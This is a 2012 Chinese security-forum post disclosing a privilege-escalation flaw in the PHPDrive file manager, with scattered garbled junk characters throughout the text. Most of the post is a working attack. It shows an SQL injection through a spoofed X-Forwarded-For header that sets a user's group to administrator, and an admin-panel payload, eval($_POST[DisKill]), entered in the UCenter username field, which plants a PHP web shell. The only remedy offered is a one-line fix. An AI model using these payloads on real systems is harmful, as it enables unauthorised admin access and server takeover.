找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2208|回复: 0
打印 上一主题 下一主题

PHPDrive权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:18:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
6 _1 e# m5 q1 V( n/ C7 H, l# ~* V" M  p
. w. D3 l, X6 P2 oincludes/user.lib.php
& b- f/ Q" x, j9 R. E7 z% O! n5 H行87% }* Z- D% m" S& l1 H
function get_ip() {
  }3 g2 g! q2 m1 A( F if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
& s6 Z( q) r2 j$ ~5 p: _, G在用户注册与登录 处module/disk/account.lead.php  p9 D. O  ]& o5 {; f. T4 b' `3 d
198行 5 B8 y, k' c2 h% j* |
//更新本次登录IP和时间. ~, m! r( e! B% W& n
             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
* \, T( X4 \: i' Q由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限: h6 q2 q8 u* Y1 J
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
2 Y: G: L( h  {) X后台getshell:  F6 o7 a* W! x- S0 ^
在UCenter设置处,将UC数据库登录名填写为5 T3 u. _, F6 F& J1 ?/ ?
9 a3 @/ ?. {; ~# r
root’);eval($_POST[DisKill]);?>/*
: E( n' m: X% k9 ^2 T可以得到一个shell,位置在 data/uc.data.php
& |" Z) ?; N* u% P+ g# L7 `4 Y% ?4 `% d; }
修复:过滤注入  I* Y2 a: ?! i

/ F1 m* E4 q9 g2 A' j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表